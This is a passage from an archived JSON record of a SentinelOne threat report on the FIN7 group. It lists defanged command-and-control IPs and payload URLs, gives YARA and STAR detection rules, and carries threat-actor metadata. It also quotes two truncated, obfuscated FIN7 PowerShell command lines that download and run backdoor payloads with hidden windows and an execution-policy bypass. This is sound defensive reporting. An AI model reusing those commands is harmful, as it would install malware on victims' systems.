IP\r\n91[.]193[.]19[.]163 Diceloader C2 IP\r\n208[.]88[.]226[.]158 Diceloader C2 IP\r\n108[.]170[.]20[.]89 Diceloader C2 IP\r\n195[.]123[.]240[.]46 Diceloader C2 IP\r\n185[.]16[.]40[.]108 Diceloader C2 IP\r\n95[.]123[.]243[.]169 Diceloader C2 IP\r\n184[.]95[.]51[.]185 Diceloader C2 IP\r\n198[.]15[.]119[.]69 Diceloader C2 IP\r\n37[.]1[.]210[.]119 Diceloader C2 IP\r\n185[.]33[.]87[.]24 Diceloader C2 IP\r\n192[.]248[.]188[.]166 Diceloader C2 IP\r\n185[.]244[.]151[.]114 Diceloader C2 IP\r\n194[.]87[.]191[.]198 Diceloader C2 IP\r\n85[.]239[.]54[.]214 Diceloader C2 IP\r\n185[.]161[.]210[.]11 Diceloader C2 IP\r\n95[.]216[.]251[.]213 Diceloader C2 IP\r\n95[.]217[.]102[.]49 Diceloader C2 IP\r\n62[.]233[.]57[.]163 Diceloader C2 IP\r\n193[.]233[.]22[.]68 Diceloader C2 IP\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 18 of 21\n\n146[.]59[.]217[.]154 Diceloader C2 IP\r\n193[.]233[.]23[.]158 Diceloader C2 IP\r\n91[.]199[.]147[.]60 Diceloader C2 IP\r\n62[.]233[.]57[.]31 Diceloader C2 IP\r\n95[.]217[.]82[.]121 Diceloader C2 IP\r\n45[.]82[.]13[.]64 Diceloader C2 IP\r\n91[.]149[.]253[.]184 Diceloader C2 IP\r\n193[.]233[.]23[.]59 Diceloader C2 IP\r\n65[.]108[.]20[.]101 Diceloader C2 IP\r\n62[.]233[.]57[.]241 Diceloader C2 IP\r\n65[.]108[.]20[.]165 Diceloader C2 IP\r\n79[.]141[.]162[.]131 Diceloader C2 IP\r\n62[.]233[.]57[.]19 Diceloader C2 IP\r\n185[.]161[.]208[.]45 Diceloader C2 IP\r\n176[.]97[.]75[.]244 Diceloader C2 IP\r\n195[.]123[.]246[.]46 Diceloader C2 IP\r\n91[.]149[.]221[.]195 Diceloader C2 IP\r\n193[.]233[.]23[.]45 Diceloader C2 IP\r\n194[.]87[.]82[.]7 Diceloader C2 IP\r\n195[.]123[.]246[.]20 Diceloader C2 IP\r\n195[.]123[.]218[.]99 Cobaltstrike C2 IP\r\n5[.]161[.]41[.]51 Minodo Backdoor C2 IP\r\nURL Notes\r\nhxxp://193.178.210[.]227/work_53.bin_m7.ps1\r\nFIN7 URL delivering Core Impact implant packed with\r\nPowertrash\r\nhxxp://45.87.154[.]208/work_53m8.ps1\r\nFIN7 URL delivering Core Impact implant packed with\r\nPowertrash\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 19 of 21\n\nhxxp://45.87.154[.]208/icsnd3b_64refl.ps1 FIN7 URL delivering Diceloader packed with Powertrash\r\nFIN7 command lines to download and execute backdoor payloads\r\npowershell.exe -ep bypass -w Hidden -noni -c\r\n\"[char[]]'%q\u003e))Ofx.Pckfdu!Ofu/XfcDmjfou*/EpxompbeTusjoh)(i(,(u(,(u(,(q(,(;(,(0(,(0(,(2(,(:(,(4(,(/(,\r\npowershell.exe -ep bypass -w Hidden -noni -Enc\r\n\"WwBjAGgAYQByAFsAXQBdACcAJQBkAG8AdQAhAD4AIQAxADwAIQBlAHAAIQB8ACEAJQBkAG8AdQAsACwAPAAhAHUAcwB6ACEAfAAh\r\nYARA Hunting Rules\r\nrule PS1_Powertrash {\r\n meta:\r\n author = \"Antonio Cocomazzi @ SentinelOne\"\r\n description = \"Detects Powertrash: an obfuscated powershell in-memory loader\"\r\n date = \"2023-04-17\"\r\n reference1 = \"https://s1.ai/FIN7-u\"\r\n reference2 = \"https://www.mandiant.com/resources/evolution-of-fin7\"\r\n reference3 = \"https://blog.morphisec.com/vmware-identity-manager-attack-backdoor\"\r\n hash = \"86533fff7813bc140c89bd2ed09b8484afe7e4ac\"\r\n strings:\r\n $regex_packer_signature = /function\\s[0-9a-zA-Z]{3,7}\\r?\\n\\{\\r?\\n(\\$[0-9a-zA-Z]{3,7}=.*\\r?\\\r\n condition:\r\n filesize \u003e 50KB and filesize \u003c 5MB and $regex_packer_signature\r\n}\r\nrule Win32_Diceloader {\r\n meta:\r\n author = \"Antonio Cocomazzi @ SentinelOne\"\r\n description = \"Detects Diceloader, aka Lizar/IceBot, a backdoor designed to infiltrate enterp\r\n date = \"2023-04-17\"\r\n reference1 = \"https://s1.ai/FIN7-u\"\r\n hash = \"0aeab70affcab0f1e96c62c25dd41dc32d41e2ea\"\r\n strings:\r\n $code1 = { 41 F7 ?? 41 03 ?? C1 FA 04 8B C2 C1 E8 1F 03 D0 6B C2 1F 44 ?? ?? 41 ?? ?? 01 }\r\n $code2 = { B9 02 02 00 00 48 8D ?? ?? ?? ?? ?? ?? [40-50] C7 ?? ?? ?? 47 6C 6F 62 C7 ?? ?? ??\r\n $code3 = { C7 ?? ?? 47 6C 6F 62 [0-6] C7 ?? ?? 61 6C 5C 25 [0-6] C7 ?? ?? 30 38 78 00 [10-14\r\n condition:\r\n uint16(0) == 0x5A4D and filesize \u003c 60KB and 1 of ($code*)\r\n}\r\nrule PIC_CoreImpact_loader {\r\n meta:\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 20 of 21\n\nauthor = \"Antonio Cocomazzi @ SentinelOne\"\r\n description = \"Detects Position Independent Code of Core Impact loaders observed in the wild\r\n date = \"2023-04-17\"\r\n reference1 = \"https://s1.ai/FIN7-u\"\r\n hash = \"52e261a7cab837489dfcb8cd49aaf82ee287968c\"\r\n strings:\r\n $code1 = { E9 [4] 5B 48 B9 [8] 49 BA [70-100] E9 05 00 00 00 E8 }\r\n $code2 = { E9 [4] 5B 53 48 BB [12] 49 BB [50-60] E9 05 00 00 00 E8}\r\n $code3 = { E9 [4] 5B 48 B9 [10] 49 BC [70-100] E9 05 00 00 00 E8 }\r\n $code4 = { E9 [4] 5B ?? ?? 49 BB [14] 48 B8 [70-100] E9 05 00 00 00 E8 }\r\n $code5 = { E9 [4] 5B ?? 48 B8 [13] 48 B9 [50-60] E9 05 00 00 00 E8}\r\n $code6 = { E9 [4] 5B ?? 48 B8 [12] 49 BD [70-100] E9 05 00 00 00 E8}\r\n $code7 = { E9 [4] 5B 48 B9 [9] 48 BA [70-100] E9 05 00 00 00 E8}\r\n condition:\r\n 1 of ($code*)\r\n}\r\nSentinelOne Singularity STAR Rules\r\nendpoint.os = 'windows' and meta.event.name = 'SCHEDTASKREGISTER' and src.process.cmdline contains (\r\nendpoint.os = 'windows' and meta.event.name = 'BEHAVIORALINDICATORS' and indicator.name = 'MultipleHo\r\nendpoint.os = 'windows' and meta.event.name ='SCRIPTS' and src.process.name = 'powershell.exe' and cm\r\nSource: https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 21 of 21", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "ETDA" ], "references": [ "https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/" ], "report_names": [ "fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks" ], "threat_actors": [ { "id": "c9617bb6-45c8-495e-9759-2177e61a8e91", "created_at": "2022-10-25T15:50:23.405039Z", "updated_at": "2026-04-10T02:00:05.387643Z", "deleted_at": null, "main_name": "Carbanak", "aliases": [ "Carbanak", "Anunak" ], "source_name": "MITRE:Carbanak", "tools": [ "Carbanak", "Mimikatz", "PsExec", "netsh" ], "source_id": "MITRE", "reports": null }, { "id": "9de1979b-40fc-44dc-855d-193edda4f3b8", "created_at": "2025-08-07T02:03:24.92723Z", "updated_at": "2026-04-10T02:00:03.755516Z", "deleted_at": null, "main_name": "GOLD LOCUST", "aliases": [ "Anunak", "Carbanak", "Carbon Spider ", "FIN7 ", "Silicon " ], "source_name": "Secureworks:GOLD LOCUST", "tools": [ "Carbanak" ], "source_id": "Secureworks", "reports": null }, { "id": "bb8702c5-52ac-4359-8409-998a7cc3eeaf", "created_at": "2023-01-06T13:46:38.405479Z", "updated_at": "2026-04-10T02:00:02.961112Z", "deleted_at": null, "main_name": "FIN7", "aliases": [ "ATK32", "G0046", "G0008", "Sangria Tempest", "ELBRUS", "GOLD NIAGARA", "Coreid", "Carbanak", "Carbon Spider", "JokerStash", "CARBON SPIDER" ], "source_name": "MISPGALAXY:FIN7", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ed3810b7-141a-4ed0-8a01-6a972b80458d", "created_at": "2022-10-25T16:07:23.443259Z", "updated_at": "2026-04-10T02:00:04.602946Z", "deleted_at": null, "main_name": "Carbanak", "aliases": [ "Anunak", "Carbanak", "Carbon Spider", "ELBRUS", "G0008", "Gold Waterfall", "Sangria Tempest" ], "source_name": "ETDA:Carbanak", "tools": [ "AVE_MARIA", "Agentemis", "AmmyyRAT", "Antak", "Anunak", "Ave Maria", "AveMariaRAT", "BABYMETAL", "BIRDDOG", "Backdoor Batel", "Batel", "Bateleur", "BlackMatter", "Boostwrite", "Cain \u0026 Abel", "Carbanak", "Cl0p", "Cobalt Strike", "CobaltStrike", "DNSMessenger", "DNSRat", "DNSbot", "DRIFTPIN", "DarkSide", "FOXGRABBER", "FlawedAmmyy", "HALFBAKED", "JS Flash", "KLRD", "MBR Eraser", "Mimikatz", "Nadrac", "Odinaff", "POWERPIPE", "POWERSOURCE", "PsExec", "SQLRAT", "Sekur", "Sekur RAT", "SocksBot", "SoftPerfect Network Scanner", "Spy.Agent.ORM", "TEXTMATE", "TeamViewer", "TiniMet", "TinyMet", "Toshliph", "VB Flash", "WARPRISM", "avemaria", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "bfded1cf-be73-44f9-a391-0751c9996f9a", "created_at": "2022-10-25T15:50:23.337107Z", "updated_at": "2026-04-10T02:00:05.252413Z", "deleted_at": null, "main_name": "FIN7", "aliases": [ "FIN7", "GOLD NIAGARA", "ITG14", "Carbon Spider", "ELBRUS", "Sangria Tempest" ], "source_name": "MITRE:FIN7", "tools": [ "Mimikatz", "AdFind", "JSS Loader", "HALFBAKED", "REvil", "PowerSploit", "CrackMapExec", "Carbanak", "Pillowmint", "Cobalt Strike", "POWERSOURCE", "RDFSNIFFER", "SQLRat", "Lizar", "TEXTMATE", "BOOSTWRITE" ], "source_id": "MITRE", "reports": null }, { "id": "d85adfe3-e1c3-40b0-b8bb-d1bacadc4d82", "created_at": "2022-10-25T16:07:23.619566Z", "updated_at": "2026-04-10T02:00:04.690061Z", "deleted_at": null, "main_name": "FIN7", "aliases": [ "APT-C-11", "ATK 32", "G0046", "Gold Niagara", "GrayAlpha", "ITG14", "TAG-CR1" ], "source_name": "ETDA:FIN7", "tools": [ "7Logger", "Agentemis", "Anubis Backdoor", "Anunak", "Astra", "BIOLOAD", "BIRDWATCH", "Bateleur", "Boostwrite", "CROWVIEW", "Carbanak", "Cobalt Strike", "CobaltStrike", "DICELOADER", "DNSMessenger", "FOWLGAZE", "HALFBAKED", "JSSLoader", "KillACK", "LOADOUT", "Lizar", "Meterpreter", "Mimikatz", "NetSupport", "NetSupport Manager", "NetSupport Manager RAT", "NetSupport RAT", "NetSupportManager RAT", "POWERPLANT", "POWERSOURCE", "RDFSNIFFER", "Ragnar Loader", "SQLRAT", "Sardonic", "Sekur", "Sekur RAT", "TEXTMATE", "Tirion", "VB Flash", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434742, "ts_updated_at": 1775792152, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0434a411803905bad418971f437d75694530be03.pdf", "text": "https://archive.orkl.eu/0434a411803905bad418971f437d75694530be03.txt", "img": "https://archive.orkl.eu/0434a411803905bad418971f437d75694530be03.jpg" } }